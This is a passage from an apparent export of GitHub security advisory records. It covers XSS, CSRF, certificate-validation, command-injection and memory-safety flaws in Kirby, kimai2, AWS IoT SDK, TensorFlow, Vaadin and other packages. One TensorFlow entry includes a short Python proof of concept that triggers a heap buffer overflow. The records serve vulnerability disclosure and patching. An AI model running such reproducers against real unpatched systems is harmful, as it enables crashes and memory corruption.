+Thanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-cq58-r77c-5jjw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41258'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/pull/3510'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:49:36Z', 'nvd_published_at': '2021-11-16T18:15:00Z'}"
+1.4.0,GHSA-427q-jp8v-ww95,2021-11-22T18:43:54Z,2021-11-23T18:16:50Z,,['CVE-2021-3976'],Cross-site Scripting in kimai2,CSRF related to duplicate action. (the duplication occurs first before redirecting to edit form). This vulnerability is capable of tricking admin users to duplicate teams.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3976'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/b28e9c120c87222e21a238f1b03a609d6a5d506e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0567048a-118c-42ec-9f94-b55533017406'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:43:54Z', 'nvd_published_at': '2021-11-19T11:15:00Z'}"
+1.4.0,GHSA-94jq-q5v2-76wj,2021-12-03T15:21:36Z,2021-11-24T21:02:24Z,,['CVE-2021-40828'],Improper certificate management in AWS IoT Device SDK v2,"Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40828'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:33:58Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}"
+1.4.0,GHSA-pgcq-h79j-2f69,2021-11-08T22:41:31Z,2021-11-10T19:03:38Z,,['CVE-2021-41206'],Incomplete validation of shapes in multiple TF ops,"### Impact
+Several TensorFlow operations are missing validation for the shapes of the tensor arguments involved in the call. Depending on the API, this can result in undefined behavior and segfault or `CHECK`-fail related crashes but in some scenarios writes and reads from heap populated arrays are also possible.
+
+We have discovered these issues internally via tooling while working on improving/testing GPU op determinism. As such, we don't have reproducers and there will be multiple fixes for these issues.
+
+### Patches
+We have patched the issue in GitHub commits [68422b215e618df5ad375bcdc6d2052e9fd3080a](https://github.com/tensorflow/tensorflow/commit/68422b215e618df5ad375bcdc6d2052e9fd3080a), [4d74d8a00b07441cba090a02e0dd9ed385145bf4](https://github.com/tensorflow/tensorflow/commit/4d74d8a00b07441cba090a02e0dd9ed385145bf4), [579261dcd446385831fe4f7457d802a59685121d](https://github.com/tensorflow/tensorflow/commit/579261dcd446385831fe4f7457d802a59685121d), [da4aad5946be30e5f049920fa076e1f7ef021261](https://github.com/tensorflow/tensorflow/commit/da4aad5946be30e5f049920fa076e1f7ef021261), [4dddb2fd0b01cdd196101afbba6518658a2c9e07](https://github.com/tensorflow/tensorflow/commit/4dddb2fd0b01cdd196101afbba6518658a2c9e07), and [e7f497570abb6b4ae5af4970620cd880e4c0c904](https://github.com/tensorflow/tensorflow/commit/e7f497570abb6b4ae5af4970620cd880e4c0c904).
+
+These fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pgcq-h79j-2f69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41206'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4d74d8a00b07441cba090a02e0dd9ed385145bf4'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4dddb2fd0b01cdd196101afbba6518658a2c9e07'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/579261dcd446385831fe4f7457d802a59685121d'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/68422b215e618df5ad375bcdc6d2052e9fd3080a'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/da4aad5946be30e5f049920fa076e1f7ef021261'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e7f497570abb6b4ae5af4970620cd880e4c0c904'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-354'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:41:31Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-93c4-vf86-3rj7,2021-11-04T17:03:36Z,2021-11-03T17:33:32Z,,['CVE-2021-33611'],Reflected cross-site scripting in vaadin-menu-bar webjar resources in Vaadin 14,Missing output sanitization in test sources in `org.webjars.bowergithub.vaadin:vaadin-menu-bar` versions 1.0.0 through 1.2.0 (Vaadin 14.0.0 through 14.4.4) allows remote attackers to execute malicious JavaScript in browser by opening crafted URL.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.4.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 14.4.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.bowergithub.vaadin:vaadin-menu-bar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-93c4-vf86-3rj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33611'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/vaadin-menu-bar/pull/126'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33611'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:53:07Z', 'nvd_published_at': '2021-11-02T10:15:00Z'}"
+1.4.0,GHSA-9cq3-fj2h-ggj5,2022-05-04T01:52:12Z,2021-11-02T15:42:31Z,,['CVE-2020-36379'],Vulnerability in remove function leads to arbitrary code execution via filePath parameters,"Aaptjs is a node wraper for aapt. An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36379'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:24:54Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-6mv9-qcx2-3hh3,2021-11-15T14:48:03Z,2021-11-11T00:55:08Z,,['CVE-2021-43174'],Memory exhaustion in routinator,"NLnet Labs Routinator versions 0.9.0 up to and including 0.10.1, support the gzip transfer encoding when querying RRDP repositories. This encoding can be used by an RRDP repository to cause an out-of-memory crash in these versions of Routinator. RRDP uses XML which allows arbitrary amounts of white space in the encoded data. The gzip scheme compresses such white space extremely well, leading to very small compressed files that become huge when being decompressed for further processing, big enough that Routinator runs out of memory when parsing input data waiting for the next XML element.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'routinator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43174'}, {'type': 'PACKAGE', 'url': 'https://github.com/NLnetLabs/routinator'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}, {'type': 'WEB', 'url': 'https://www.nlnetlabs.nl/downloads/routinator/CVE-2021-43172_CVE-2021-43173_CVE-2021-43174.txt'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T19:04:55Z', 'nvd_published_at': '2021-11-09T17:15:00Z'}"
+1.4.0,GHSA-cqv6-3phm-hcwx,2021-11-08T22:02:26Z,2021-11-10T18:50:17Z,,['CVE-2021-41221'],Access to invalid memory during shape inference in `Cudnn*` ops,"### Impact
+The [shape inference code](https://github.com/tensorflow/tensorflow/blob/9ff27787893f76d6971dcd1552eb5270d254f31b/tensorflow/core/ops/cudnn_rnn_ops.cc) for the `Cudnn*` operations in TensorFlow can be tricked into accessing invalid memory, via a heap buffer overflow:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def func():
+ return tf.raw_ops.CudnnRNNV3(
+ input=[0.1, 0.1],
+ input_h=[0.5],
+ input_c=[0.1, 0.1, 0.1],
+ params=[0.5, 0.5],
+ sequence_lengths=[-1, 0, 1])
+
+func()
+```
+
+This occurs because the ranks of the `input`, `input_h` and `input_c` parameters are not validated, but code assumes they have certain values:
+
+```cc
+auto input_shape = c->input(0);
+auto input_h_shape = c->input(1);
+auto seq_length = c->Dim(input_shape, 0);
+auto batch_size = c->Dim(input_shape, 1); // assumes rank >= 2
+auto num_units = c->Dim(input_h_shape, 2); // assumes rank >= 3
+```
+
+### Patches
+We have patched the issue in GitHub commit [af5fcebb37c8b5d71c237f4e59c6477015c78ce6](https://github.com/tensorflow/tensorflow/commit/af5fcebb37c8b5d71c237f4e59c6477015c78ce6).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cqv6-3phm-hcwx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41221'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/af5fcebb37c8b5d71c237f4e59c6477015c78ce6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:02:26Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-x7j7-qp7j-hw3q,2021-11-16T15:46:57Z,2021-11-16T17:04:19Z,,['CVE-2021-41252'],Cross-site scripting (XSS) from writer field content in the site frontend,"### Impact
+
+Kirby's [writer field](https://getkirby.com/docs/reference/panel/fields/writer) stores its formatted content as HTML code. Unlike with other field types, it is not possible to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks, otherwise the formatting would be lost.
+
+Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.
+
+Because the writer field did not securely sanitize its contents on save, it was possible to inject malicious HTML code into the content file by sending it to Kirby's API directly without using the Panel. This malicious HTML code would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.
+
+This vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.
+
+You are *not* affected if you don't use the writer field in any of your blueprints. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into writer field content.
+
+### Patches
+
+We have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by sanitizing all writer field contents on the backend whenever the content is modified via Kirby's API. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.
+
+### Credits
+
+Thanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-x7j7-qp7j-hw3q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41252'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/25fc5c6b330442e6433c99befc688f3698c5d1fc'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:46:57Z', 'nvd_published_at': '2021-11-16T18:15:00Z'}"
+1.4.0,GHSA-533p-cp2g-99wp,2021-11-17T21:12:46Z,2021-11-15T23:19:09Z,,['CVE-2021-3931'],snipe-it is vulnerable to Cross-Site Request Forgery (CSRF),snipe-it is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3931'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/0d811d067c8e064252c0143c39d6cd4c3133679e'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/03b21d69-3bf5-4b2f-a2cf-872dd677a68f'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:09:15Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-4r9c-jghc-cx5m,2021-11-08T21:26:37Z,2021-11-10T16:45:34Z,,['CVE-2021-25978'],Cross-site Scripting in apostrophe,"Apostrophe CMS versions between 2.63.0 to 3.3.1 are vulnerable to Stored XSS where an editor uploads an SVG file that contains malicious JavaScript onto the Images module, which triggers XSS once viewed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.63.0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25978'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/apostrophe/commit/c8b94ee9c79468f1ce28e31966cb0e0839165e59'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/apostrophe'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:26:37Z', 'nvd_published_at': '2021-11-07T18:15:00Z'}"
+1.4.0,GHSA-j3f7-7rmc-6wqj,2021-12-03T15:22:22Z,2021-11-24T20:35:03Z,,['CVE-2021-40831'],Improper certificate management in AWS IoT Device SDK v2,"The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been “overridden”. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40831'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:23:57Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}"
+1.4.0,GHSA-w6ww-fmfx-2x22,2021-11-10T18:14:59Z,2021-11-10T19:56:04Z,,['CVE-2021-3911'],Misconfigured IP address field in ROA leads to OctoRPKI crash,"If the ROA that a repository returns contains too many bits for the IP address then OctoRPKI will crash.
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-w6ww-fmfx-2x22'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3911'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/2882307febd66801de97b2a2ce4d93fe58132005'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0252'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20', 'CWE-252'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:14:59Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-3pqh-p72c-fj85,2021-11-19T13:10:27Z,2021-11-19T19:34:26Z,,['CVE-2021-3978'],Improper Preservation of Permissions in github.com/cloudflare/cfrpki/cmd/octorpki,"### Impact
+
+When copying files with rsync, octorpki uses the ""-a"" flag 0, which forces rsync to copy binaries with the suid bit set as root. Since the provided service definition defaults to root (https://github.com/cloudflare/cfrpki/blob/master/package/octorpki.service) this could allow for a vector, when combined with another vulnerability that causes octorpki to process a malicious TAL file, for a local privilege escalation.
+
+## For more information
+
+If you have any questions or comments about this advisory email us at security@cloudflare.com",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3pqh-p72c-fj85'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}]","{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-19T13:10:27Z', 'nvd_published_at': None}"
